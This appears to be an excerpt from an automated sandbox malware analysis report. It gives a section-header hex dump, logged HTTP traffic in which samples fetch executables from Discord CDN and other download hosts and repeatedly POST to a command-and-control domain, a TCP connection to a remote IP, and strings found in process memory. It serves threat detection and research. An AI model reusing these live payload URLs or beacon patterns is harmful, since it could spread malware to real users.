00 00 02 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 58 6f 0c 00 00 60 03 00 58 6f 0c 00 00 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 40 07 00 00 d0 0f 00 dd 28 07 00 00 76 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                        Source: global traffic HTTP traffic detected: HTTP/1.1 200 OK Server: nginx/1.20.1 Date: Wed, 01 Dec 2021 09:04:40 GMT Content-Type: application/x-msdos-program Content-Length: 163328 Connection: close Last-Modified: Tue, 30 Nov 2021 16:21:14 GMT ETag: "27e00-5d203f23b200e" Accept-Ranges: bytes
                        Source: global traffic HTTP traffic detected: HTTP/1.1 200 OK Server: nginx/1.20.1 Date: Wed, 01 Dec 2021 09:04:44 GMT Content-Type: application/x-msdos-program Content-Length: 351744 Connection: close Last-Modified: Wed, 01 Dec 2021 09:04:02 GMT ETag: "55e00-5d211f48282b5" Accept-Ranges: bytes
                        Source: global traffic HTTP traffic detected: HTTP/1.1 200 OK Server: nginx/1.20.1 Date: Wed, 01 Dec 2021 09:04:47 GMT Content-Type: application/x-msdos-program Content-Length: 336896 Connection: close Last-Modified: Wed, 01 Dec 2021 09:04:01 GMT ETag: "52400-5d211f4808eb5" Accept-Ranges: bytes
                        Source: global traffic HTTP traffic detected: HTTP/1.1 200 OK Server: nginx/1.20.1 Date: Wed, 01 Dec 2021 09:04:53 GMT Content-Type: application/x-msdos-program Content-Length: 2740224 Connection: close Last-Modified: Sun, 28 Nov 2021 10:30:25 GMT ETag: "29d000-5d1d6cff91027" Accept-Ranges: bytes
                        Source: global traffic HTTP traffic detected: HTTP/1.1 200 OK Server: nginx/1.20.2 Date: Wed, 01 Dec 2021 09:05:00 GMT Content-Type: application/x-msdos-program Content-Length: 645592 Connection: close Last-Modified: Thu, 21 Oct 2021 11:48:30 GMT ETag: "9d9d8-5cedb79317f80" Accept-Ranges: bytes
                        Source: global traffic HTTP traffic detected: HTTP/1.1 200 OK Server: nginx/1.20.1 Date: Wed, 01 Dec 2021 09:05:01 GMT Content-Type: application/x-msdos-program Content-Length: 1143000 Connection: close Last-Modified: Tue, 30 Nov 2021 20:10:32 GMT ETag: "1170d8-5d2072645dc9e" Accept-Ranges: bytes
                        Source: global traffic HTTP traffic detected: GET /attachments/914960103592054858/914961866462232616/Oldening.exe HTTP/1.1 Connection: Keep-Alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Host: cdn.discordapp.com
                        Source: global traffic HTTP traffic detected: POST / HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: */* Referer: http://yubswhv.net/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 293 Host: host-data-coin-11.com
                        Source: global traffic HTTP traffic detected: POST / HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: */* Referer: http://jmuwhyhn.net/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 316 Host: host-data-coin-11.com
                        Source: global traffic HTTP traffic detected: POST / HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: */* Referer: http://piyyyphtem.net/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 257 Host: host-data-coin-11.com
                        Source: global traffic HTTP traffic detected: POST / HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: */* Referer: http://llalic.com/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 268 Host: host-data-coin-11.com
                        Source: global traffic HTTP traffic detected: POST / HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: */* Referer: http://higvbe.net/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 283 Host: host-data-coin-11.com
                        Source: global traffic HTTP traffic detected: POST / HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: */* Referer: http://nvrwtjsdku.com/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 276 Host: host-data-coin-11.com
                        Source: global traffic HTTP traffic detected: GET /files/8723_1638191106_2017.exe HTTP/1.1 Connection: Keep-Alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Host: host-file-host-3.com
                        Source: global traffic HTTP traffic detected: POST / HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: */* Referer: http://mojyvpeoe.com/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 334 Host: host-data-coin-11.com
                        Source: global traffic HTTP traffic detected: POST / HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: */* Referer: http://yaoomuahu.net/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 364 Host: host-data-coin-11.com
                        Source: global traffic HTTP traffic detected: POST / HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: */* Referer: http://dgpnslqhh.com/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 343 Host: host-data-coin-11.com
                        Source: global traffic HTTP traffic detected: POST / HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: */* Referer: http://gbbxygekjk.com/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 231 Host: host-data-coin-11.com
                        Source: global traffic HTTP traffic detected: POST / HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: */* Referer: http://namawqf.com/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 308 Host: host-data-coin-11.com
                        Source: global traffic HTTP traffic detected: POST / HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: */* Referer: http://smpro.com/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 200 Host: host-data-coin-11.com
                        Source: global traffic HTTP traffic detected: POST / HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: */* Referer: http://ieqswdu.net/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 234 Host: host-data-coin-11.com
                        Source: global traffic HTTP traffic detected: POST / HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: */* Referer: http://vneyujlfl.net/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 255 Host: host-data-coin-11.com
                        Source: global traffic HTTP traffic detected: POST / HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: */* Referer: http://viqgctnic.net/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 234 Host: host-data-coin-11.com
                        Source: global traffic HTTP traffic detected: POST / HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: */* Referer: http://xpkskgrr.net/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 205 Host: host-data-coin-11.com
                        Source: global traffic HTTP traffic detected: POST / HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: */* Referer: http://kdyponywr.net/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 344 Host: host-data-coin-11.com
                        Source: global traffic HTTP traffic detected: POST / HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: */* Referer: http://rxdwffwjbf.com/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 136 Host: host-data-coin-11.com
                        Source: global traffic HTTP traffic detected: POST / HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: */* Referer: http://molwdgi.net/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 231 Host: host-data-coin-11.com
                        Source: global traffic HTTP traffic detected: GET /files/6096_1638289274_6885.exe HTTP/1.1 Connection: Keep-Alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Host: host-file-host-3.com
                        Source: global traffic HTTP traffic detected: POST / HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: */* Referer: http://gghke.net/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 189 Host: host-data-coin-11.com
                        Source: global traffic HTTP traffic detected: POST / HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: */* Referer: http://dpsjrby.org/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 224 Host: host-data-coin-11.com
                        Source: global traffic HTTP traffic detected: POST / HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: */* Referer: http://mlwynhpbb.org/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 272 Host: host-data-coin-11.com
                        Source: global traffic HTTP traffic detected: POST / HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: */* Referer: http://njupmvh.com/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 168 Host: host-data-coin-11.com
                        Source: global traffic HTTP traffic detected: GET /game.exe HTTP/1.1 Connection: Keep-Alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Host: host-file-host-3.com
                        Source: global traffic HTTP traffic detected: POST / HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: */* Referer: http://mjghwr.org/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 346 Host: host-data-coin-11.com
                        Source: global traffic HTTP traffic detected: POST / HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: */* Referer: http://unuta.org/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 254 Host: host-data-coin-11.com
                        Source: global traffic HTTP traffic detected: POST / HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: */* Referer: http://fucabofxh.net/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 197 Host: host-data-coin-11.com
                        Source: global traffic HTTP traffic detected: POST / HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: */* Referer: http://guasgjf.org/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 247 Host: host-data-coin-11.com
                        Source: global traffic HTTP traffic detected: GET /downloads/toolspab3.exe HTTP/1.1 Connection: Keep-Alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Host: privacytoolzforyou-7000.com
                        Source: global traffic HTTP traffic detected: POST / HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: */* Referer: http://bfwtp.org/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 110 Host: host-data-coin-11.com
                        Source: global traffic HTTP traffic detected: POST / HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: */* Referer: http://pubplnqymd.org/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 368 Host: host-data-coin-11.com
                        Source: global traffic HTTP traffic detected: POST / HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: */* Referer: http://xwkfccuhh.com/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 126 Host: host-data-coin-11.com
                        Source: global traffic HTTP traffic detected: POST / HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: */* Referer: http://vndygv.com/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 292 Host: host-data-coin-11.com
                        Source: global traffic HTTP traffic detected: POST / HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: */* Referer: http://wyjxomh.net/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 113 Host: host-data-coin-11.com
                        Source: global traffic HTTP traffic detected: POST / HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: */* Referer: http://mdthdprqu.com/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 212 Host: host-data-coin-11.com
                        Source: global traffic HTTP traffic detected: GET /files/4152_1638095425_4339.exe HTTP/1.1 Connection: Keep-Alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Host: host-file-host-3.com
                        Source: global traffic HTTP traffic detected: POST / HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: */* Referer: http://qpiidyh.net/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 242 Host: host-data-coin-11.com
                        Source: global traffic HTTP traffic detected: POST / HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: */* Referer: http://mgjqknucl.net/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 178 Host: host-data-coin-11.com
                        Source: global traffic HTTP traffic detected: POST / HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: */* Referer: http://ehiesag.net/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 268 Host: host-data-coin-11.com
                        Source: global traffic HTTP traffic detected: POST / HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: */* Referer: http://eyepuy.net/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 293 Host: host-data-coin-11.com
                        Source: global traffic HTTP traffic detected: POST / HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: */* Referer: http://lqyvwperx.org/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 268 Host: host-data-coin-11.com
                        Source: global traffic HTTP traffic detected: POST / HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: */* Referer: http://omcxl.net/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 293 Host: host-data-coin-11.com
                        Source: global traffic HTTP traffic detected: POST / HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: */* Referer: http://vhude.com/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 130 Host: host-data-coin-11.com
                        Source: global traffic HTTP traffic detected: GET /files/5311_1638303032_7343.exe HTTP/1.1 Connection: Keep-Alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Host: host-file-host-3.com
                        Source: global traffic HTTP traffic detected: POST / HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: */* Referer: http://rxjdalrcm.com/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 230 Host: host-data-coin-11.com
                        Source: global traffic HTTP traffic detected: POST / HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: */* Referer: http://wxhnpjysno.com/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 113 Host: host-data-coin-11.com
                        Source: global traffic HTTP traffic detected: POST / HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: */* Referer: http://tiketfrip.net/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 130 Host: host-data-coin-11.com
                        Source: global traffic HTTP traffic detected: POST / HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: */* Referer: http://srvivkc.org/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 194 Host: host-data-coin-11.com
                        Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://jjguoq.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 261Host: host-data-coin-11.com
                        Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://ysemel.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 207Host: host-data-coin-11.com
                        Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://dagsykb.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 133Host: host-data-coin-11.com
                        Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://owgeqjie.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 143Host: host-data-coin-11.com
                        Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://rvwnoilj.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 360Host: host-data-coin-11.com
                        Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://ggqrkginit.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 116Host: host-data-coin-11.com
                        Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://vutak.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 194Host: host-data-coin-11.com
                        Source: global trafficTCP traffic: 192.168.2.3:49850 -> 45.9.20.149:42871
                        Source: A70A.exe, 0000000B.00000002.601138545.0000000003CC2000.00000004.00000001.sdmp, C169.exe, 00000017.00000002.593807750.0000000002CE4000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/SymmetricKey
                        Source: A70A.exe, 0000000B.00000002.601138545.0000000003CC2000.00000004.00000001.sdmp, C169.exe, 00000017.00000002.593807750.0000000002CE4000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/spnego
                        Source: A70A.exe, 0000000B.00000002.601138545.0000000003CC2000.00000004.00000001.sdmp, C169.exe, 00000017.00000002.593807750.0000000002CE4000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/tlsnego
                        Source: A70A.exe, 0000000B.00000002.600595408.0000000003C31000.00000004.00000001.sdmp, C169.exe, 00000017.00000002.589600785.0000000002C51000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/dns
                        Source: A70A.exe, 0000000B.00000002.601138545.0000000003CC2000.00000004.00000001.sdmp, C169.exe, 00000017.00000002.593807750.0000000002CE4000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                        Source: A70A.exe, 0000000B.00000002.600595408.0000000003C31000.00000004.00000001.sdmp, C169.exe, 00000017.00000002.589600785.0000000002C51000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/right/possessproperty
                        Source: A70A.exe, 0000000B.00000002.601138545.0000000003CC2000.00000004.00000001.sdmp, C169.exe, 00000017.00000002.593626249.0000000002CE0000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2006/02/addressingidentity
                        Source: A70A.exe, 0000000B.00000002.606343545.0000000004099000.00000004.00000001.sdmp, C169.exe, 00000017.00000002.594676104.0000000002E09000.00000004.00000001.sdmp, C169.exe, 00000017.00000002.598347234.000000000302C000.00000004.00000001.sdmp, C169.exe, 00000017.00000002.593807750.0000000002CE4000.00000004.00000001.sdmpString found in binary or memory: http://service.r
                        Source: A70A.exe, 0000000B.00000002.606343545.0000000004099000.00000004.00000001.sdmp, C169.exe, 00000017.00000002.594676104.0000000002E09000.00000004.00000001.sdmp, C169.exe, 00000017.00000002.598347234.000000000302C000.00000004.00000001.sdmp, C169.exe, 00000017.00000002.593807750.0000000002CE4000.00000004.00000001.sdmpString found in binary or memory: http://service.real.com/realplayer/security/02062012_player/en/
                        Source: A70A.exe, 0000000B.00000002.606343545.0000000004099000.00000004.00000001.sdmp, C169.exe, 00000017.00000002.594676104.0000000002E09000.00000004.00000001.sdmp, C169.exe, 00000017.00000002.598347234.000000000302C000.00000004.00000001.sdmp, C169.exe, 00000017.00000002.593807750.0000000002CE4000.00000004.00000001.sdmpString found in binary or memory: http://support.a
                        Source: A70A.exe, 0000000B.00000002.606343545.0000000004099000.00000004.00000001.sdmp, C169.exe, 00000017.00000002.594676104.0000000002E09000.00000004.00000001.sdmp, C169.exe, 00000017.00000002.598347234.000000000302C000.00000004.00000001.sdmp, C169.exe, 00000017.00000002.593807750.0000000002CE4000.00000004.00000001.sdmp, D375.exe, 0000001A.00000003.520863558.000000000154E000.00000004.00000001.sdmp, D375.exe, 0000001A.00000003.482990720.000000000154A000.00000004.00000001.sdmpString found in binary or memory: http://support.apple.com/kb/HT203092
                        Source: D375.exe, 0000001A.00000003.520863558.000000000154E000.00000004.00000001.sdmpString found in binary or memory: http://support.apple.com/kb/HT203092w
                        Source: C169.exe, 00000017.00000002.593807750.0000000002CE4000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/
                        Source: A70A.exe, 0000000B.00000002.600595408.0000000003C31000.00000004.00000001.sdmp, C169.exe, 00000017.00000002.589600785.0000000002C51000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Entity/Id1
                        Source: A70A.exe, 0000000B.00000002.600595408.0000000003C31000.00000004.00000001.sdmp, C169.exe, 00000017.00000002.589600785.0000000002C51000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Entity/Id10
                        Source: A70A.exe, 0000000B.00000002.600595408.0000000003C31000.00000004.00000001.sdmp, A70A.exe, 0000000B.00000002.601972098.0000000003DB2000.00000004.00000001.sdmp, C169.exe, 00000017.00000002.589600785.0000000002C51000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Entity/Id10Response
                        Source: A70A.exe, 0000000B.00000002.600595408.0000000003C31000.00000004.00000001.sdmp, C169.exe, 00000017.00000002.589600785.0000000002C51000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Entity/Id11
                        Source: A70A.exe, 0000000B.00000002.603991878.0000000003EBE000.00000004.00000001.sdmp, A70A.exe, 0000000B.00000002.600595408.0000000003C31000.00000004.00000001.sdmp, A70A.exe, 0000000B.00000002.601138545.0000000003CC2000.00000004.00000001.sdmp, C169.exe, 00000017.00000002.589600785.0000000002C51000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Entity/Id11Response
                        Source: A70A.exe, 0000000B.00000002.600595408.0000000003C31000.00000004.00000001.sdmp, C169.exe, 00000017.00000002.589600785.0000000002C51000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Entity/Id12
                        Source: A70A.exe, 0000000B.00000002.603991878.0000000003EBE000.00000004.00000001.sdmp, A70A.exe, 0000000B.00000002.600595408.0000000003C31000.00000004.00000001.sdmp, A70A.exe, 0000000B.00000002.601138545.0000000003CC2000.00000004.00000001.sdmp, C169.exe, 00000017.00000002.589600785.0000000002C51000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Entity/Id12Response
                        Source: A70A.exe, 0000000B.00000002.600595408.0000000003C31000.00000004.00000001.sdmp, C169.exe, 00000017.00000002.589600785.0000000002C51000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Entity/Id13
                        Source: A70A.exe, 0000000B.00000002.600595408.0000000003C31000.00000004.00000001.sdmp, A70A.exe, 0000000B.00000002.601138545.0000000003CC2000.00000004.00000001.sdmp, C169.exe, 00000017.00000002.589600785.0000000002C51000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Entity/Id13Response
                        Source: A70A.exe, 0000000B.00000002.600595408.0000000003C31000.00000004.00000001.sdmp, C169.exe, 00000017.00000002.589600785.0000000002C51000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Entity/Id14
                        Source: A70A.exe, 0000000B.00000002.600595408.0000000003C31000.00000004.00000001.sdmp, A70A.exe, 0000000B.00000002.601138545.0000000003CC2000.00000004.00000001.sdmp, C169.exe, 00000017.00000002.589600785.0000000002C51000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Entity/Id14Response
                        Source: A70A.exe, 0000000B.00000002.600595408.0000000003C31000.00000004.00000001.sdmp, C169.exe, 00000017.00000002.589600785.0000000002C51000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Entity/Id15
                        Source: A70A.exe, 0000000B.00000002.600595408.0000000003C31000.00000004.00000001.sdmp, A70A.exe, 0000000B.00000002.601972098.0000000003DB2000.00000004.00000001.sdmp, C169.exe, 00000017.00000002.589600785.0000000002C51000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Entity/Id15Response
                        Source: A70A.exe, 0000000B.00000002.600595408.0000000003C31000.00000004.00000001.sdmp, C169.exe, 00000017.00000002.589600785.0000000002C51000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Entity/Id16
                        Source: A70A.exe, 0000000B.00000002.600595408.0000000003C31000.00000004.00000001.sdmp, A70A.exe, 0000000B.00000002.601138545.0000000003CC2000.00000004.00000001.sdmp, C169.exe, 00000017.00000002.589600785.0000000002C51000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Entity/Id16Response
                        Source: A70A.exe, 0000000B.00000002.600595408.0000000003C31000.00000004.00000001.sdmp, C169.exe, 00000017.00000002.589600785.0000000002C51000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Entity/Id17
                        Source: A70A.exe, 0000000B.00000002.603991878.0000000003EBE000.00000004.00000001.sdmp, A70A.exe, 0000000B.00000002.600595408.0000000003C31000.00000004.00000001.sdmp, A70A.exe, 0000000B.00000002.601138545.0000000003CC2000.00000004.00000001.sdmp, C169.exe, 00000017.00000002.589600785.0000000002C51000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Entity/Id17Response
